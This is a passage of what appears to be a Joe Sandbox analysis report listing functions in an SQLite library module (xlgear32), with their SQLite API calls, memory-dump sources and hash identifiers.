                                                                            • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DA4
                                                                            • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DB8
                                                                          • sqlite3_stricmp.SQLITE3 ref: 6094D3DA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_stricmp$sqlite3_mutex_entersqlite3_mutex_leave
                                                                          • String ID: BINARY$INTEGER
                                                                          • API String ID: 317512412-1676293250
                                                                          • Opcode ID: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                          • Instruction ID: cace79839434994537c0410bddb438ad3d501bddbf1b20fcc6a8a8bdb5da7fdd
                                                                          • Opcode Fuzzy Hash: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                          • Instruction Fuzzy Hash: 8E712978A056099BDB05CF69C49079EBBF2BFA8308F11C529EC55AB3A4D734E941CF80
                                                                          Function 6094B54C Relevance: 7.6, APIs: 5, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 6094B582
                                                                          • sqlite3_step.SQLITE3 ref: 6094B590
                                                                          • sqlite3_column_int64.SQLITE3 ref: 6094B5AD
                                                                          • sqlite3_reset.SQLITE3 ref: 6094B5EE
                                                                          • memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: memmovesqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_step
                                                                          • String ID:
                                                                          • API String ID: 2802900177-0
                                                                          • Opcode ID: f7dd783d858009ac2aa36dfb06bc3a4e86bc75c1920f7d1bf53ec4d0fe99899e
                                                                          • Instruction ID: fa681a173a9aa7ad5377a8f3376375fc0286f70c891b696e42c92f52458a3a0e
                                                                          • Opcode Fuzzy Hash: f7dd783d858009ac2aa36dfb06bc3a4e86bc75c1920f7d1bf53ec4d0fe99899e
                                                                          • Instruction Fuzzy Hash: 0B517D75A082018FCB14CF69C48169EF7F7FBA8314F25C669D8499B318EA74EC81CB81
                                                                          Function 6093F42E Relevance: 6.4, APIs: 4, Instructions: 416COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_mutex_enter.SQLITE3 ref: 6093F443
                                                                            • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                          • sqlite3_mutex_enter.SQLITE3 ref: 6093F45C
                                                                            • Part of subcall function 60939559: memcmp.MSVCRT ref: 60939694
                                                                            • Part of subcall function 60939559: memcmp.MSVCRT ref: 609396CA
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6093F8CD
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6093F8E3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: memcmpsqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                          • String ID:
                                                                          • API String ID: 4038589952-0
                                                                          • Opcode ID: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                          • Instruction ID: 916146ddc5613ce70bfe97dc7fabc38680eb49f4f4fdba01105907ea2da9c682
                                                                          • Opcode Fuzzy Hash: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                          • Instruction Fuzzy Hash: 87F13674A046158FDB18CFA9C590A9EB7F7AFA8308F248429E846AB355D774EC42CF40
                                                                          Function 6094C64A Relevance: 6.2, APIs: 4, Instructions: 201COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                                            • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                                            • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                                            • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 6094C719
                                                                          • sqlite3_step.SQLITE3 ref: 6094C72A
                                                                          • sqlite3_reset.SQLITE3 ref: 6094C73B
                                                                            • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                            • Part of subcall function 6094A9F5: sqlite3_free.SQLITE3(?,?,?,00000000,?,?,6094AC3F), ref: 6094AA7A
                                                                          • sqlite3_free.SQLITE3 ref: 6094C881
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_bind_int64sqlite3_freesqlite3_resetsqlite3_step$memmovesqlite3_column_int64
                                                                          • String ID:
                                                                          • API String ID: 3487101843-0
                                                                          • Opcode ID: 010aee262a3d8dae5049234a4ef50880699508b325a3cdc2c8e6f431e5b9abd3
                                                                          • Instruction ID: dadb85a3919e548a164012fc2e04d9b0ab11445217433cc10b515e99a95ed5c3
                                                                          • Opcode Fuzzy Hash: 010aee262a3d8dae5049234a4ef50880699508b325a3cdc2c8e6f431e5b9abd3
                                                                          • Instruction Fuzzy Hash: 3681FA74A046098FCB44DF99C480A9DF7F7AFA8354F258529E855AB314EB34EC46CF90
                                                                          Function 6096A38C Relevance: 6.1, APIs: 4, Instructions: 76COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                            • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                            • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                          • sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                            • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                          • sqlite3_column_int.SQLITE3 ref: 6096A3F3
                                                                          • sqlite3_step.SQLITE3 ref: 6096A435
                                                                          • sqlite3_reset.SQLITE3 ref: 6096A445
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_bind_intsqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_prepare_v2sqlite3_resetsqlite3_step
                                                                          • String ID:
                                                                          • API String ID: 247099642-0
                                                                          • Opcode ID: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                          • Instruction ID: 69535c0605dcb565d56369453fd68d3a3097adfd173720c6e67b3d4aca8354ad
                                                                          • Opcode Fuzzy Hash: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                          • Instruction Fuzzy Hash: FF2151B0A143148BEB109FA9D88479EB7FAEF64308F00852DE89597350EBB8D845CF51
                                                                          Function 6096A2BD Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                            • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                            • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                            • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                          • sqlite3_step.SQLITE3 ref: 6096A32D
                                                                          • sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                            • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                          • sqlite3_reset.SQLITE3 ref: 6096A354
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2sqlite3_resetsqlite3_stepsqlite3_value_int
                                                                          • String ID:
                                                                          • API String ID: 326482775-0
                                                                          • Opcode ID: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                          • Instruction ID: 7c1586c82cd56d85cf32929a5cd575737867df940847ca2bf63216634e784e33
                                                                          • Opcode Fuzzy Hash: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                          • Instruction Fuzzy Hash: 0E214DB0A043049BDB04DFA9C480B9EF7FAEFA8354F04C429E8959B340E778D8418B51
                                                                          Function 6095F7F7 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                            • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                            • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 6095F83D
                                                                            • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 6095F85E
                                                                          • sqlite3_step.SQLITE3 ref: 6095F869
                                                                          • sqlite3_reset.SQLITE3 ref: 6095F874
                                                                            • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                            • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_bind_int64sqlite3_mutex_leave$sqlite3_freesqlite3_mprintfsqlite3_mutex_entersqlite3_prepare_v2sqlite3_resetsqlite3_step
                                                                          • String ID:
                                                                          • API String ID: 2747803115-0
                                                                          • Opcode ID: e7ba5a424be07f97404f27e37360827cc19527dc01f9216413d7b5c44ff8a2c2
                                                                          • Instruction ID: f00e87c6dd3c8672f4b8fa92d33f96d93ee8ab4b9f2e93312e2458fba8eee522
                                                                          • Opcode Fuzzy Hash: e7ba5a424be07f97404f27e37360827cc19527dc01f9216413d7b5c44ff8a2c2
                                                                          • Instruction Fuzzy Hash: 9311DBB4A046049FCB04DF69C0C565AF7F6EFA8318F05C869E8898B349E735E894CB91
                                                                          Function 6094B6ED Relevance: 4.5, APIs: 3, Instructions: 34COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 6094B71E
                                                                            • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 6094B73C
                                                                          • sqlite3_step.SQLITE3 ref: 6094B74A
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_bind_int64$sqlite3_mutex_leavesqlite3_step
                                                                          • String ID:
                                                                          • API String ID: 3305529457-0
                                                                          • Opcode ID: dc92f9052f14c19b23696c87723feab2593fd922d888b89f432a916288e70c30
                                                                          • Instruction ID: cea3564161c85327b61b62d60446574847d05a2bcfebeda4641ea5396b37aa5a
                                                                          • Opcode Fuzzy Hash: dc92f9052f14c19b23696c87723feab2593fd922d888b89f432a916288e70c30
                                                                          • Instruction Fuzzy Hash: D401A8B45047049FCB00DF19D9C968ABBE5FF98354F158869FC888B305D374E8548BA6
                                                                          Function 6090C1D6 Relevance: 3.0, APIs: 2, Instructions: 39COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_mutex_enter.SQLITE3 ref: 6090C1EA
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6090C22F
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                          • String ID:
                                                                          • API String ID: 1477753154-0
                                                                          • Opcode ID: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                          • Instruction ID: fc120f7ed3300d8301d0f99cb769197b575d5683181bd6b289e4b53452841bc5
                                                                          • Opcode Fuzzy Hash: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                          • Instruction Fuzzy Hash: 6501F4715042548BDB449F2EC4C576EBBEAEF65318F048469DD419B326D374D882CBA1
                                                                          Function 609255D4 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 609255B2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_logsqlite3_mutex_leave
                                                                          • String ID:
                                                                          • API String ID: 1465156292-0
                                                                          • Opcode ID: 61f2b65abbb078f396bfa931b2809e4962fa985140118a0fa907d432528e7d54
                                                                          • Instruction ID: 19c4c58ecb434a21204d9b38047e93a23a7f28015e8477a734fda6841bb58fe8
                                                                          • Opcode Fuzzy Hash: 61f2b65abbb078f396bfa931b2809e4962fa985140118a0fa907d432528e7d54
                                                                          • Instruction Fuzzy Hash: 56317AB4A082188FCB04DF69D880A8EBBF6FF99314F008559FC5897348D734D940CBA5
                                                                          Function 6092570B Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 60925769
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_logsqlite3_mutex_leave
                                                                          • String ID:
                                                                          • API String ID: 1465156292-0
                                                                          • Opcode ID: f78b12b45e858c7fd8cb74f5d211d4e30abbc68d4504511404b73e1b177a8d68
                                                                          • Instruction ID: d5dd20366bd30be5098f9e48471fbeb1ccf01997be5a2761bb4486817e6b3aba
                                                                          • Opcode Fuzzy Hash: f78b12b45e858c7fd8cb74f5d211d4e30abbc68d4504511404b73e1b177a8d68
                                                                          • Instruction Fuzzy Hash: 23F08171A10A28D7CB106F29EC8958EBBB9FF69254B055058ECC1A730CDB35D925C791
                                                                          Function 609254B1 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 60925508
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_logsqlite3_mutex_leave
                                                                          • String ID:
                                                                          • API String ID: 1465156292-0
                                                                          • Opcode ID: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                          • Instruction ID: ad89f0bb34aa7175efe61e1ac22fb0c12735e6005c3b9edbf096fd229bca234b
                                                                          • Opcode Fuzzy Hash: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                          • Instruction Fuzzy Hash: 5A01A475B107148BCB109F2ACC8164BBBFAEF68254F05991AEC41DB315D775ED458BC0
                                                                          Function 60925686 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_logsqlite3_mutex_leave
                                                                          • String ID:
                                                                          • API String ID: 1465156292-0
                                                                          • Opcode ID: ebbe32869a67294cb2d54c108597a832b3743d43329dcf341f64f2493053d601
                                                                          • Instruction ID: 4fd0dfe8dd6226820e052206e0db6187a6d8a97f2116fb4a305c2fd2856f8961
                                                                          • Opcode Fuzzy Hash: ebbe32869a67294cb2d54c108597a832b3743d43329dcf341f64f2493053d601
                                                                          • Instruction Fuzzy Hash: 94F08CB5A002099BCB00DF2AD88088ABBBAFF98264B05952AEC049B314D770E941CBD0
                                                                          Function 60925655 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 60925678
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_logsqlite3_mutex_leave
                                                                          • String ID:
                                                                          • API String ID: 1465156292-0
                                                                          • Opcode ID: 20ce1548f611e36a3668a48b9975394e1a388ab84833d9cb320a678b216caf11
                                                                          • Instruction ID: bc2fa39936d9f4ed0ba1ebf98b65e017ff83ed2bbf5e058a49948814e7f33c49
                                                                          • Opcode Fuzzy Hash: 20ce1548f611e36a3668a48b9975394e1a388ab84833d9cb320a678b216caf11
                                                                          • Instruction Fuzzy Hash: 59E0EC74A042089BCB04DF6AD4C194AB7F9EF58258B14D665EC458B309E231E9858BC1
